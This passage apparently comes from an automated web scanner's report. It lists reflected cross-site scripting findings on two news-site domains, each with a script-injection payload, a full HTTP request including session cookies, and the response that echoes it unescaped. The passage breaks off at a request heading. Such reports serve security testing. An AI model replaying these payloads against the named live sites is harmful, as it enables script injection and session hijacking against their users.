The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8ad77<script>alert(1)</script>6b2cbf250f6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pages8ad77<script>alert(1)</script>6b2cbf250f6/v3_video HTTP/1.1 Host: www.csnne.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:57 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:57 GMT Content-Length: 758 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/pages8ad77<script>alert(1)</script>6b2cbf250f6/v3_video"</strong> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ee131<script>alert(1)</script>53f0b12ef66 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /pages/v3_videoee131<script>alert(1)</script>53f0b12ef66 HTTP/1.1 Host: www.csnne.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;
Response (redirected)
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:57 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:57 GMT Content-Length: 777 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/common/404.html?p=/pages/v3_videoee131<script>alert(1)</script>53f0b12ef66"</strong> ...[SNIP]...
2.367. http://www.csnne.com/pages/v3_video [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.csnne.com
Path:
/pages/v3_video
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1daf3"><script>alert(1)</script>aa23ecb918d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pages/v3_video?1daf3"><script>alert(1)</script>aa23ecb918d=1 HTTP/1.1 Host: www.csnne.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 77815 Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:56 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:56 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <input type=hidden name="1daf3"><script>alert(1)</script>aa23ecb918d" id = "1daf3"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 35cdf<script>alert(1)</script>2ff35bb459d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pages35cdf<script>alert(1)</script>2ff35bb459d/video HTTP/1.1 Host: www.csnne.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:58 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:58 GMT Content-Length: 755 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/pages35cdf<script>alert(1)</script>2ff35bb459d/video"</strong> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 92d33<script>alert(1)</script>01aa7fffa0a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /pages/video92d33<script>alert(1)</script>01aa7fffa0a HTTP/1.1 Host: www.csnne.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;
Response (redirected)
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:59 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:59 GMT Content-Length: 774 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/common/404.html?p=/pages/video92d33<script>alert(1)</script>01aa7fffa0a"</strong> ...[SNIP]...
2.370. http://www.csnne.com/pages/video [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.csnne.com
Path:
/pages/video
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7663e"><script>alert(1)</script>9a93b141082 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pages/video?7663e"><script>alert(1)</script>9a93b141082=1 HTTP/1.1 Host: www.csnne.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 77943 Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:58 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:58 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <input type=hidden name="7663e"><script>alert(1)</script>9a93b141082" id = "7663e"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bda9a<script>alert(1)</script>ba56988bb13 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /commonbda9a<script>alert(1)</script>ba56988bb13/ad_count.php HTTP/1.1 Host: www.csnnw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=201742339.1292783244.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=c8f0f9b5d04b6070c714e4d5bd8f9c4a; __utma=201742339.733990484.1292783244.1292783244.1292783244.1; __utmc=201742339; __utmb=201742339;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:46 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:46 GMT Content-Length: 763 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/commonbda9a<script>alert(1)</script>ba56988bb13/ad_count.php"</strong> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a94d7<script>alert(1)</script>12e5eddf679 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /common/ad_count.phpa94d7<script>alert(1)</script>12e5eddf679 HTTP/1.1 Host: www.csnnw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=201742339.1292783244.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=c8f0f9b5d04b6070c714e4d5bd8f9c4a; __utma=201742339.733990484.1292783244.1292783244.1292783244.1; __utmc=201742339; __utmb=201742339;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:46 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:46 GMT Content-Length: 763 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/common/ad_count.phpa94d7<script>alert(1)</script>12e5eddf679"</strong> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c75a1<script>alert(1)</script>c1d7133d4b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /commonc75a1<script>alert(1)</script>c1d7133d4b/dynrss/dynrss_5274_landing2_.rss HTTP/1.1 Host: www.csnnw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=201742339.1292783244.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=c8f0f9b5d04b6070c714e4d5bd8f9c4a; __utma=201742339.733990484.1292783244.1292783244.1292783244.1; __utmc=201742339; __utmb=201742339;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:48 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:48 GMT Content-Length: 782 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/commonc75a1<script>alert(1)</script>c1d7133d4b/dynrss/dynrss_5274_landing2_.rss"</strong> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 353b7<script>alert(1)</script>f719ed744a0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /common/dynrss353b7<script>alert(1)</script>f719ed744a0/dynrss_5274_landing2_.rss HTTP/1.1 Host: www.csnnw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=201742339.1292783244.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=c8f0f9b5d04b6070c714e4d5bd8f9c4a; __utma=201742339.733990484.1292783244.1292783244.1292783244.1; __utmc=201742339; __utmb=201742339;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:48 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:48 GMT Content-Length: 783 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/common/dynrss353b7<script>alert(1)</script>f719ed744a0/dynrss_5274_landing2_.rss"</strong> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9e62c<script>alert(1)</script>7655387658b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /common/dynrss/dynrss_5274_landing2_.rss9e62c<script>alert(1)</script>7655387658b HTTP/1.1 Host: www.csnnw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=201742339.1292783244.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=c8f0f9b5d04b6070c714e4d5bd8f9c4a; __utma=201742339.733990484.1292783244.1292783244.1292783244.1; __utmc=201742339; __utmb=201742339;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:48 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:48 GMT Content-Length: 783 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/common/dynrss/dynrss_5274_landing2_.rss9e62c<script>alert(1)</script>7655387658b"</strong> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f6295<script>alert(1)</script>a48d9ccfc20 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /commonf6295<script>alert(1)</script>a48d9ccfc20/global_flash/player/player.php HTTP/1.1 Host: www.csnnw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=201742339.1292783244.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=c8f0f9b5d04b6070c714e4d5bd8f9c4a; __utma=201742339.733990484.1292783244.1292783244.1292783244.1; __utmc=201742339; __utmb=201742339;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:48 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:48 GMT Content-Length: 781 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/commonf6295<script>alert(1)</script>a48d9ccfc20/global_flash/player/player.php"</strong> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload db088<script>alert(1)</script>7dc4a01b386 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /common/global_flashdb088<script>alert(1)</script>7dc4a01b386/player/player.php HTTP/1.1 Host: www.csnnw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=201742339.1292783244.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=c8f0f9b5d04b6070c714e4d5bd8f9c4a; __utma=201742339.733990484.1292783244.1292783244.1292783244.1; __utmc=201742339; __utmb=201742339;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:49 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:49 GMT Content-Length: 781 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/common/global_flashdb088<script>alert(1)</script>7dc4a01b386/player/player.php"</strong> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload eea4e<script>alert(1)</script>358c2f3c96f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /common/global_flash/playereea4e<script>alert(1)</script>358c2f3c96f/player.php HTTP/1.1 Host: www.csnnw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=201742339.1292783244.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=c8f0f9b5d04b6070c714e4d5bd8f9c4a; __utma=201742339.733990484.1292783244.1292783244.1292783244.1; __utmc=201742339; __utmb=201742339;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:49 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:49 GMT Content-Length: 781 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/common/global_flash/playereea4e<script>alert(1)</script>358c2f3c96f/player.php"</strong> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ca1fd<script>alert(1)</script>dfb0b59e48 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /common/global_flash/player/player.phpca1fd<script>alert(1)</script>dfb0b59e48 HTTP/1.1 Host: www.csnnw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=201742339.1292783244.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=c8f0f9b5d04b6070c714e4d5bd8f9c4a; __utma=201742339.733990484.1292783244.1292783244.1292783244.1; __utmc=201742339; __utmb=201742339;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:50 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:50 GMT Content-Length: 780 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/common/global_flash/player/player.phpca1fd<script>alert(1)</script>dfb0b59e48"</strong> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a34c6<script>alert(1)</script>d4a1ecc00e3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /common/js/a34c6<script>alert(1)</script>d4a1ecc00e3 HTTP/1.1 Host: www.csnnw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=201742339.1292783244.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=c8f0f9b5d04b6070c714e4d5bd8f9c4a; __utma=201742339.733990484.1292783244.1292783244.1292783244.1; __utmc=201742339; __utmb=201742339;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:49 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:49 GMT Content-Length: 754 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/common/js/a34c6<script>alert(1)</script>d4a1ecc00e3"</strong> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 99e5b<script>alert(1)</script>5fea6cf4743 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /99e5b<script>alert(1)</script>5fea6cf4743 HTTP/1.1 Host: www.csnnw.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Server: Apache Vary: Accept-Encoding Content-Type: text/html Expires: Sun, 19 Dec 2010 18:35:21 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:35:21 GMT Connection: close Content-Length: 744
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/99e5b<script>alert(1)</script>5fea6cf4743"</strong> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9ce55<script>alert(1)</script>1176dc7b761 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pages9ce55<script>alert(1)</script>1176dc7b761/landing2 HTTP/1.1 Host: www.csnnw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=201742339.1292783244.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=c8f0f9b5d04b6070c714e4d5bd8f9c4a; __utma=201742339.733990484.1292783244.1292783244.1292783244.1; __utmc=201742339; __utmb=201742339;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:53 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:53 GMT Content-Length: 758 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/pages9ce55<script>alert(1)</script>1176dc7b761/landing2"</strong> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e4526<script>alert(1)</script>f2e0763ea76 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /pages/landing2e4526<script>alert(1)</script>f2e0763ea76 HTTP/1.1 Host: www.csnnw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=201742339.1292783244.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=c8f0f9b5d04b6070c714e4d5bd8f9c4a; __utma=201742339.733990484.1292783244.1292783244.1292783244.1; __utmc=201742339; __utmb=201742339;
Response (redirected)
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:53 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:53 GMT Content-Length: 777 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/common/404.html?p=/pages/landing2e4526<script>alert(1)</script>f2e0763ea76"</strong> ...[SNIP]...
2.384. http://www.csnnw.com/pages/landing2 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.csnnw.com
Path:
/pages/landing2
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9d02"><script>alert(1)</script>29dc0cc948d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
